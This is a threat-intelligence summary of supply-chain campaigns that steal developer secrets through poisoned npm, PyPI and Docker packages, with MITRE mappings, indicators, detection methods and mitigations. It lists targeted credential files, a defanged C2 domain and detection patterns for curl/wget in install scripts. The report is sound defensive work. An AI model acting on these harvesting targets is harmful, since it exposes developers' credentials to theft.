Full Report
Supply chain attackers are not only trying to slip malicious code into trusted software. They are trying to steal the access that makes trusted software possible. Recently, three separate campaigns hit npm, PyPI, and Docker Hub in a 48-hour window, and all three targeted secrets from developer environments and CI/CD pipelines, including API keys, cloud credentials, SSH keys, and tokens. This is
Analysis Summary
# Tool/Technique: Shai-Hulud / TeamPCP (Supply Chain Credential Harvesting)
## Overview
This technique represents a shift in software supply chain attacks where the primary objective is no longer just injecting malicious code into downstream products, but harvesting highly privileged "secrets" from developer workstations and CI/CD pipelines. By targeting the developer environment, attackers gain the credentials (API keys, tokens, SSH keys) necessary to impersonate trusted users and gain persistent access to the entire software delivery lifecycle (SDLC).
## Technical Details
- **Type:** Malware family / Supply Chain Attack Campaign
- **Platform:** Cross-platform (Windows, macOS, Linux) via npm, PyPI, and Docker ecosystems.
- **Capabilities:** Credential theft, automated environment scanning, exfiltration of secrets, self-propagation via poisoned packages or dependency updates.
- **First Seen:** Early occurrences noted; "Shai-Hulud 2.0" and "mini Shai Hulud" campaigns active circa 2024-2026.
## MITRE ATT&CK Mapping
- **[TA0001 - Initial Access]**
- [T1195.002 - Supply Chain Compromise: Compromise Software Dependencies]
- **[TA0006 - Credential Access]**
- [T1552 - Unsecured Credentials]
- [T1552.001 - Credentials In Files]
- [T1552.004 - Private Keys]
- **[TA0007 - Discovery]**
- [T1083 - File and Directory Discovery]
- [T1082 - System Information Discovery]
- **[TA0010 - Exfiltration]**
- [T1041 - Exfiltration Over C2 Channel]
## Functionality
### Core Capabilities
- **Automated Secret Scanning:** Recursively searches developer workstations for `.env` files, shell history, `.bash_history`, `.zsh_history`, and configuration files like `.npmrc` or `.aws/credentials`.
- **Infrastructure Context Mapping:** Identifies the "context" of a workstation by linking discovery data (e.g., matching a GitHub token found in a README to a specific private repository listed in a Git remote config).
- **Tool-Specific Harvesting:** Specifically targets credentials for developer tools including npm, PyPI, Docker Hub, and GitHub.
### Advanced Features
- **CI/CD Pipeline Pivot:** Uses harvested tokens to move from a developer workstation into automated build environments (GitHub Actions, GitLab CI/CD) to alter software during the build phase.
- **Agentic/Self-Propagating Loops:** Infecting a workstation allows the attacker to publish new malicious versions of internal packages, which are then automatically pulled by other developers or automated systems, creating a "mini Shai-Hulud" propagation effect.
## Indicators of Compromise
- **File Names:** `.env`, `npm-debug.log`, `config.json`, `.aws/credentials`, `id_rsa`.
- **Network Indicators:**
- Exfiltration to unknown GitHub Gists or Pastebin-like services.
- C2 traffic to domains masquerading as package registries (e.g., `registry.npmjs.org[.]io`).
- **Behavioral Indicators:**
- Unexpected `curl` or `wget` commands originating from package install scripts (`preinstall`, `postinstall`).
- Sudden, high-volume read access to hidden configuration files in user directories by a package manager process.
## Associated Threat Actors
- **TeamPCP:** Known for using compromised packages and developer tooling to harvest environment variables.
- **Shai-Hulud Campaigns:** Associated with large-scale credential collection across GitHub and cloud services via poisoned dependencies.
## Detection Methods
- **Signature-based detection:** Scanning package manifests (`package.json`, `setup.py`) for suspicious install scripts.
- **Behavioral detection:** Monitoring for developer tools (node, python, docker) attempting to access sensitive files outside of their expected scope (e.g., reading SSH keys or shell histories).
- **YARA rules:** Focused on identifying common exfiltration patterns in scripts, such as regex strings looking for `AIza...` (Google API keys) or `ghp_...` (GitHub Personal Access Tokens).
## Mitigation Strategies
- **Secrets Management:** Use tools like Vault or 1Password for SSH keys and API tokens rather than storing them in plain-text `.env` files or system environment variables.
- **Least Privilege:** Implement fine-grained access tokens (e.g., GitHub Fine-grained PATs) with minimal permissions and short expiration windows.
- **Dependency Pinning:** Use lockfiles (`package-lock.json`, `poetry.lock`) and perform integrity checks to ensure dependencies haven't been tampered with.
- **Workstation Hardening:** Treat developer machines as high-trust assets with strict EDR monitoring for file-system access to sensitive directories.
## Related Tools/Techniques
- **Dependency Confusion:** A technique often used to deliver these credential-harvesting payloads.
- **Typosquatting:** Registering domains or package names similar to popular tools to deceive developers into installing malicious code.
- **Token Leakage via Logs:** Exploiting CI/CD logs that inadvertently print secrets during build failures.